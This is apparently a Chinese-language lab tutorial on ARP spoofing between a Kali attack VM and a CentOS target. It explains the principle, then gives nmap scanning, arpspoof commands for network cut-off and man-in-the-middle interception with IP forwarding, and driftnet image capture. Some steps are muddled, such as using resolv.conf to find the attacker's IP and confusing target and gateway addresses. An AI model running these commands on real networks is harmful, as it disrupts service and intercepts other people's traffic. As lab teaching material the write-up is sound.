arp欺骗

1.基本原理

        

ARP攻击就是通过伪造IP地址和MAC地址实现ARP欺骗，能够在网络中产生大量的ARP通信量，攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目，造成网络中断或中间人攻击。

当局域网中一台机器，反复向其他机器，特别是向网关，发送这样无效假冒的ARP应答信息包时，严重的网络堵塞就会开始。由于网关MAC地址错误，所以从网络中计算机发来的数据无法正常发到网关，自然无法正常上网。这就造成了无法访问外网的问题，由于很多时候网关还控制着我们的局域网LAN上网，所以这时我们的LAN访问也就出现问题了。

2.实验准备      

        一台攻击虚拟机（kali），一台靶机（centos）

3.实验步骤

        一.断网攻击：

        首先查看攻击机ip

cat /etc/resolv.conf

使用nmap命令扫描靶机

nmap -sP 192.168.237.*

其中2为攻击机IP，查看靶机ip确定攻击目标

确定攻击机ip为192.168.237.15，使用工具arpspoof进行攻击

arpspoof -i eth0 -t 192.168.237.15  192.168.237.2

此时再使用靶机尝试ping百度，发现无法ping通；当我们停止断网攻击后，网络恢复

说明攻击成功

二.ARP欺骗攻击：

        首先需要开启IP转发功能

cat /proc/sys/net/ipv4/ip_forward

echo 1 > /proc/sys/net/ipv4/ip_forward

其中echo表示写入，写入1则开启转发功能，写入0则是上面的截断功能

使用arpspoof进行欺诈攻击

arpspoof -i eth0 -t 192.168.237.2  192.168.237.15

（注意这次是网关在前面，ip在后面）

因为只能解析http网站，无法解析https网站（有特殊的加密系统），所以我们以一个不存在的网页为例

对不起，你访问的页面不存在

 靶机

攻击机

使用这个命令可以查看网页的图片

driftnet -i eth0

实验结束